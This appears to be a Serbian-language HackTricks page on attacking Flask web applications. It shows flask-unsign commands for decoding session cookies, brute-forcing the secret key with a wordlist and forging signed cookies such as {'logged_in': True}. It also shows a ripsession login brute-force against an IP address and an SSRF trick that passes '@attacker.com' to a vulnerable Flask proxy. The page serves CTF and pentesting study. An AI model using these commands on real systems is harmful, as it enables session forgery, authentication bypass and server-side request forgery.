Flask

Tip

Nauči i vežbaj AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Nauči i vežbaj GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Nauči i vežbaj Az Hacking: HackTricks Training Azure Red Team Expert (AzRTE) Pregledaj kompletan HackTricks Training katalog za assessment tracks (ARTA/GRTA/AzRTA) i Linux Hacking Expert (LHE).

Podrži HackTricks

Verovatno, ako igrate CTF, Flask aplikacija će biti povezana sa SSTI.

Cookies

Default cookie session name is session.

Dekoder

Online Flask cookies dekoder: https://www.kirsle.net/wizards/flask-session.cgi

Ručno

Uzmite prvi deo cookie-a do prve tačke i Base64 dekodirajte ga:

echo "ImhlbGxvIg" | base64 -d

Cookie je takođe potpisan pomoću lozinke

Flask-Unsign

Alat komandne linije za preuzimanje, dekodiranje, brute-force i kreiranje session cookies za Flask aplikaciju pogađanjem secret keys.

Client Challenge

pip3 install flask-unsign

flask-unsign --decode --cookie 'eyJsb2dnZWRfaW4iOmZhbHNlfQ.XDuWxQ.E2Pyb6x3w-NODuflHoGnZOEpbH8'

Brute Force

flask-unsign --wordlist /usr/share/wordlists/rockyou.txt --unsign --cookie '<cookie>' --no-literal-eval

Potpisivanje

flask-unsign --sign --cookie "{'logged_in': True}" --secret 'CHANGEME'

Potpisivanje korišćenjem legacy (starih verzija)

flask-unsign --sign --cookie "{'logged_in': True}" --secret 'CHANGEME' --legacy

RIPsession

Alat za komandnu liniju za brute-force web sajtova koristeći cookies kreirane sa flask-unsign.

GitHub - Tagvi/ripsession: A command line tool to brute-force websites using cookies crafted with flask-unsign. \xc2\xb7 GitHub

ripsession -u 10.10.11.100 -c "{'logged_in': True, 'username': 'changeMe'}" -s password123 -f "user doesn't exist" -w wordlist.txt

Ovaj primer koristi sqlmap eval option da automatski potpiše sqlmap payloads za flask koristeći poznati secret.

Flask Proxy to SSRF

U ovom writeupu objašnjeno je kako Flask dozvoljava zahtev koji počinje znakom “@”:

GET @/ HTTP/1.1
Host: target.com
Connection: close

Koji u sledećem scenariju:

from flask import Flask
from requests import get

app = Flask('__main__')
SITE_NAME = 'https://google.com/'

@app.route('/', defaults={'path': ''})
@app.route('/<path:path>')
def proxy(path):
return get(f'{SITE_NAME}{path}').content

app.run(host='0.0.0.0', port=8080)

Može omogućiti unošenje nečega poput “@attacker.com” kako bi se izazvao SSRF.

Tip

Nauči i vežbaj AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Nauči i vežbaj GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Nauči i vežbaj Az Hacking: HackTricks Training Azure Red Team Expert (AzRTE) Pregledaj kompletan HackTricks Training katalog za assessment tracks (ARTA/GRTA/AzRTA) i Linux Hacking Expert (LHE).

Podrži HackTricks